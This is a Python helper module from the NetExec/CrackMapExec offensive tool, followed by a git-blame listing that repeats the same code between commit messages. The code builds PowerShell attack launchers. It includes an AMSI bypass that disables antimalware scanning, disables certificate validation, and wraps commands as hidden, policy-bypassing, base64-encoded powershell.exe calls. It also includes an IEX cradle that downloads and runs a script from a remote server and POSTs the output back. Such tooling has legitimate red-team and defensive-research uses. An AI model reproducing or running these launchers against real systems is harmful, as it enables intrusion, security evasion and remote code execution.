NetExec/cme/helpers/powershell.py

import cme
import os
import logging
import re
from base64 import b64encode

def get_ps_script(path):
    return os.path.join(os.path.dirname(cme.__file__), 'data', path)

def obfs_ps_script(script):
    """
    Strip block comments, line comments, empty lines, verbose statements,
    and debug statements from a PowerShell source file.
    """
    # strip block comments
    strippedCode = re.sub(re.compile('<#.*?#>', re.DOTALL), '', script)
    # strip blank lines, lines starting with #, and verbose/debug statements
    strippedCode = "\n".join([line for line in strippedCode.split('\n') if ((line.strip() != '') and (not line.strip().startswith("#")) and (not line.strip().lower().startswith("write-verbose ")) and (not line.strip().lower().startswith("write-debug ")) )])
    return strippedCode

def create_ps_command(ps_command, force_ps32=False, nothidden=False):
    ps_command = """[Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};
try{{
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true)
}}catch{{}}
{}
""".format(ps_command)

    logging.debug('Unincoded command:\n' + ps_command)

    if force_ps32:
        command = """$command = '{}'
if ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64')
{{

    $exec = $Env:windir + '\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -exec bypass -window hidden -noni -nop -encoded ' + $command
    IEX $exec
}}
else
{{
    $exec = [System.Convert]::FromBase64String($command)
    $exec = [Text.Encoding]::Unicode.GetString($exec)
    IEX $exec

}}""".format(b64encode(ps_command.encode('UTF-16LE')))

        if nothidden is True:
            command = 'powershell.exe -exec bypass -window maximized -encoded {}'.format(b64encode(command.encode('UTF-16LE')))
        else:
            command = 'powershell.exe -exec bypass -window hidden -noni -nop -encoded {}'.format(b64encode(command.encode('UTF-16LE')))

    elif not force_ps32:
        if nothidden is True:
            command = 'powershell.exe -exec bypass -window maximized -encoded {}'.format(b64encode(ps_command.encode('UTF-16LE')))
        else:
            command = 'powershell.exe -exec bypass -window hidden -noni -nop -encoded {}'.format(b64encode(ps_command.encode('UTF-16LE')))

    return command

def gen_ps_iex_cradle(server, addr, port, script_name, command):
    launcher = '''
    IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/{ps_script_name}');
    $cmd = {command};
    $request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/');
    $request.Method = 'POST';
    $request.ContentType = 'application/x-www-form-urlencoded';
    $bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd);
    $request.ContentLength = $bytes.Length;
    $requestStream = $request.GetRequestStream();
    $requestStream.Write( $bytes, 0, $bytes.Length );
    $requestStream.Close();
    $request.GetResponse();'''.format(server=server,
                                      port=port,
                                      addr=addr,
                                      ps_script_name=script_name,
                                      command=command)

    logging.debug('Generated PS IEX Launcher:\n {}'.format(launcher))

    return launcher
Refactoring for packiging is now complete! 2016-06-04 07:13:38 +00:00			`import cme`
			`import os`
Implemented @mattifestation's AMSI bypass and multiple bugfixes - @mattifestation's AMSI bypass now gets called before executing powershell commands or scripts - Squashed some bugs related to account bruteforcing, enumerating users and creating/deleting the UseLogonCredential reg key 2016-08-06 16:28:16 +00:00			`import logging`
Initial commit for v4.0 Just fyi for anyone reading this, it's not even close to being finished. The amount of changes are pretty insane, this commit is to serve as a refrence point for myself. Highlights for v4.0: - The whole codebase has been re-written from scratch - Codebase has been cut around 2/4 - Protocols are now modular! In theory we could use CME for everything - Module chaining has been removed for now, still trying to figure out a more elegant solution - Workspaces have implemented in cmedb - The smb protocol's database schema has been changed to support storing users, groups and computers with their respective memberships and relations. - I'm in the process of re-writing most of the modules, will re-add them once i've finished 2016-12-15 07:28:00 +00:00			`import re`
goddammit, git add bro 2016-05-16 23:48:31 +00:00			`from base64 import b64encode`

Refactoring for packiging is now complete! 2016-06-04 07:13:38 +00:00			`def get_ps_script(path):`
Initial commit for the powerview and memscraper modules The powerview module will replace all of the get_net* modules Memscraper module stil has a bug which i'm working on 2016-06-17 07:34:38 +00:00			`return os.path.join(os.path.dirname(cme.__file__), 'data', path)`
Refactoring for packiging is now complete! 2016-06-04 07:13:38 +00:00
Initial implementation of module chaining Oook, this commit is basicallu just so I can start tracking (and testing) all of the changes made so far: - All execution methods are now completely fileless, all output and/or batch files get outputted/hosted locally on a SMB server that gets spun up on runtime - Module structure has been modified for module chaining - Module chaining implementation is currently very hacky, I definitly have to figure out something more elegant but for now it works. Module chaining is performed via the -MC flag and has it's own mini syntax (will be adding it to the wiki) - You can now specify credential ID ranges using the -id flag - Added the eventvwr_bypass and rundll32_exec modules - Renamed a lot of the modules for naming consistency TODO: - Launchers/Payloads need to be escaped before being generated when module chaining - Add check for modules 'required_server' attribute - Finish modifying the functions in the Connection object so they return the results 2016-09-12 06:52:50 +00:00			`def obfs_ps_script(script):`
goddammit, git add bro 2016-05-16 23:48:31 +00:00			`"""`
			`Strip block comments, line comments, empty lines, verbose statements,`
			`and debug statements from a PowerShell source file.`
			`"""`
			`# strip block comments`
			`strippedCode = re.sub(re.compile('<#.*?#>', re.DOTALL), '', script)`
			`# strip blank lines, lines starting with #, and verbose/debug statements`
			`strippedCode = "\n".join([line for line in strippedCode.split('\n') if ((line.strip() != '') and (not line.strip().startswith("#")) and (not line.strip().lower().startswith("write-verbose ")) and (not line.strip().lower().startswith("write-debug ")) )])`
			`return strippedCode`

Initial implementation of module chaining Oook, this commit is basicallu just so I can start tracking (and testing) all of the changes made so far: - All execution methods are now completely fileless, all output and/or batch files get outputted/hosted locally on a SMB server that gets spun up on runtime - Module structure has been modified for module chaining - Module chaining implementation is currently very hacky, I definitly have to figure out something more elegant but for now it works. Module chaining is performed via the -MC flag and has it's own mini syntax (will be adding it to the wiki) - You can now specify credential ID ranges using the -id flag - Added the eventvwr_bypass and rundll32_exec modules - Renamed a lot of the modules for naming consistency TODO: - Launchers/Payloads need to be escaped before being generated when module chaining - Add check for modules 'required_server' attribute - Finish modifying the functions in the Connection object so they return the results 2016-09-12 06:52:50 +00:00			`def create_ps_command(ps_command, force_ps32=False, nothidden=False):`
Implemented @mattifestation's AMSI bypass and multiple bugfixes - @mattifestation's AMSI bypass now gets called before executing powershell commands or scripts - Squashed some bugs related to account bruteforcing, enumerating users and creating/deleting the UseLogonCredential reg key 2016-08-06 16:28:16 +00:00			`ps_command = """[Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};`
Initial commit for v4.0 Just fyi for anyone reading this, it's not even close to being finished. The amount of changes are pretty insane, this commit is to serve as a refrence point for myself. Highlights for v4.0: - The whole codebase has been re-written from scratch - Codebase has been cut around 2/4 - Protocols are now modular! In theory we could use CME for everything - Module chaining has been removed for now, still trying to figure out a more elegant solution - Workspaces have implemented in cmedb - The smb protocol's database schema has been changed to support storing users, groups and computers with their respective memberships and relations. - I'm in the process of re-writing most of the modules, will re-add them once i've finished 2016-12-15 07:28:00 +00:00			`try{{`
Implemented @mattifestation's AMSI bypass and multiple bugfixes - @mattifestation's AMSI bypass now gets called before executing powershell commands or scripts - Squashed some bugs related to account bruteforcing, enumerating users and creating/deleting the UseLogonCredential reg key 2016-08-06 16:28:16 +00:00			`[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true)`
			`}}catch{{}}`
			`{}`
			`""".format(ps_command)`

			`logging.debug('Unincoded command:\n' + ps_command)`

goddammit, git add bro 2016-05-16 23:48:31 +00:00			`if force_ps32:`
			`command = """$command = '{}'`
Initial commit for v4.0 Just fyi for anyone reading this, it's not even close to being finished. The amount of changes are pretty insane, this commit is to serve as a refrence point for myself. Highlights for v4.0: - The whole codebase has been re-written from scratch - Codebase has been cut around 2/4 - Protocols are now modular! In theory we could use CME for everything - Module chaining has been removed for now, still trying to figure out a more elegant solution - Workspaces have implemented in cmedb - The smb protocol's database schema has been changed to support storing users, groups and computers with their respective memberships and relations. - I'm in the process of re-writing most of the modules, will re-add them once i've finished 2016-12-15 07:28:00 +00:00			`if ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64')`
goddammit, git add bro 2016-05-16 23:48:31 +00:00			`{{`
Initial commit for v4.0 Just fyi for anyone reading this, it's not even close to being finished. The amount of changes are pretty insane, this commit is to serve as a refrence point for myself. Highlights for v4.0: - The whole codebase has been re-written from scratch - Codebase has been cut around 2/4 - Protocols are now modular! In theory we could use CME for everything - Module chaining has been removed for now, still trying to figure out a more elegant solution - Workspaces have implemented in cmedb - The smb protocol's database schema has been changed to support storing users, groups and computers with their respective memberships and relations. - I'm in the process of re-writing most of the modules, will re-add them once i've finished 2016-12-15 07:28:00 +00:00
goddammit, git add bro 2016-05-16 23:48:31 +00:00			`$exec = $Env:windir + '\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -exec bypass -window hidden -noni -nop -encoded ' + $command`
			`IEX $exec`
			`}}`
			`else`
			`{{`
			`$exec = [System.Convert]::FromBase64String($command)`
			`$exec = [Text.Encoding]::Unicode.GetString($exec)`
			`IEX $exec`

			`}}""".format(b64encode(ps_command.encode('UTF-16LE')))`
Initial commit for v4.0 Just fyi for anyone reading this, it's not even close to being finished. The amount of changes are pretty insane, this commit is to serve as a refrence point for myself. Highlights for v4.0: - The whole codebase has been re-written from scratch - Codebase has been cut around 2/4 - Protocols are now modular! In theory we could use CME for everything - Module chaining has been removed for now, still trying to figure out a more elegant solution - Workspaces have implemented in cmedb - The smb protocol's database schema has been changed to support storing users, groups and computers with their respective memberships and relations. - I'm in the process of re-writing most of the modules, will re-add them once i've finished 2016-12-15 07:28:00 +00:00
Initial implementation of module chaining Oook, this commit is basicallu just so I can start tracking (and testing) all of the changes made so far: - All execution methods are now completely fileless, all output and/or batch files get outputted/hosted locally on a SMB server that gets spun up on runtime - Module structure has been modified for module chaining - Module chaining implementation is currently very hacky, I definitly have to figure out something more elegant but for now it works. Module chaining is performed via the -MC flag and has it's own mini syntax (will be adding it to the wiki) - You can now specify credential ID ranges using the -id flag - Added the eventvwr_bypass and rundll32_exec modules - Renamed a lot of the modules for naming consistency TODO: - Launchers/Payloads need to be escaped before being generated when module chaining - Add check for modules 'required_server' attribute - Finish modifying the functions in the Connection object so they return the results 2016-09-12 06:52:50 +00:00			`if nothidden is True:`
			`command = 'powershell.exe -exec bypass -window maximized -encoded {}'.format(b64encode(command.encode('UTF-16LE')))`
			`else:`
			`command = 'powershell.exe -exec bypass -window hidden -noni -nop -encoded {}'.format(b64encode(command.encode('UTF-16LE')))`
goddammit, git add bro 2016-05-16 23:48:31 +00:00
			`elif not force_ps32:`
Initial implementation of module chaining Oook, this commit is basicallu just so I can start tracking (and testing) all of the changes made so far: - All execution methods are now completely fileless, all output and/or batch files get outputted/hosted locally on a SMB server that gets spun up on runtime - Module structure has been modified for module chaining - Module chaining implementation is currently very hacky, I definitly have to figure out something more elegant but for now it works. Module chaining is performed via the -MC flag and has it's own mini syntax (will be adding it to the wiki) - You can now specify credential ID ranges using the -id flag - Added the eventvwr_bypass and rundll32_exec modules - Renamed a lot of the modules for naming consistency TODO: - Launchers/Payloads need to be escaped before being generated when module chaining - Add check for modules 'required_server' attribute - Finish modifying the functions in the Connection object so they return the results 2016-09-12 06:52:50 +00:00			`if nothidden is True:`
			`command = 'powershell.exe -exec bypass -window maximized -encoded {}'.format(b64encode(ps_command.encode('UTF-16LE')))`
			`else:`
			`command = 'powershell.exe -exec bypass -window hidden -noni -nop -encoded {}'.format(b64encode(ps_command.encode('UTF-16LE')))`
goddammit, git add bro 2016-05-16 23:48:31 +00:00
Initial commit for v4.0 Just fyi for anyone reading this, it's not even close to being finished. The amount of changes are pretty insane, this commit is to serve as a refrence point for myself. Highlights for v4.0: - The whole codebase has been re-written from scratch - Codebase has been cut around 2/4 - Protocols are now modular! In theory we could use CME for everything - Module chaining has been removed for now, still trying to figure out a more elegant solution - Workspaces have implemented in cmedb - The smb protocol's database schema has been changed to support storing users, groups and computers with their respective memberships and relations. - I'm in the process of re-writing most of the modules, will re-add them once i've finished 2016-12-15 07:28:00 +00:00			`return command`

			`def gen_ps_iex_cradle(server, addr, port, script_name, command):`
			`launcher = '''`
			`IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/{ps_script_name}');`
			`$cmd = {command};`
			`$request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/');`
			`$request.Method = 'POST';`
			`$request.ContentType = 'application/x-www-form-urlencoded';`
			`$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd);`
			`$request.ContentLength = $bytes.Length;`
			`$requestStream = $request.GetRequestStream();`
			`$requestStream.Write( $bytes, 0, $bytes.Length );`
			`$requestStream.Close();`
			`$request.GetResponse();'''.format(server=server,`
			`port=port,`
			`addr=addr,`
			`ps_script_name=script_name,`
			`command=command)`

			`logging.debug('Generated PS IEX Launcher:\n {}'.format(launcher))`
goddammit, git add bro 2016-05-16 23:48:31 +00:00
Initial commit for v4.0 Just fyi for anyone reading this, it's not even close to being finished. The amount of changes are pretty insane, this commit is to serve as a refrence point for myself. Highlights for v4.0: - The whole codebase has been re-written from scratch - Codebase has been cut around 2/4 - Protocols are now modular! In theory we could use CME for everything - Module chaining has been removed for now, still trying to figure out a more elegant solution - Workspaces have implemented in cmedb - The smb protocol's database schema has been changed to support storing users, groups and computers with their respective memberships and relations. - I'm in the process of re-writing most of the modules, will re-add them once i've finished 2016-12-15 07:28:00 +00:00			`return launcher`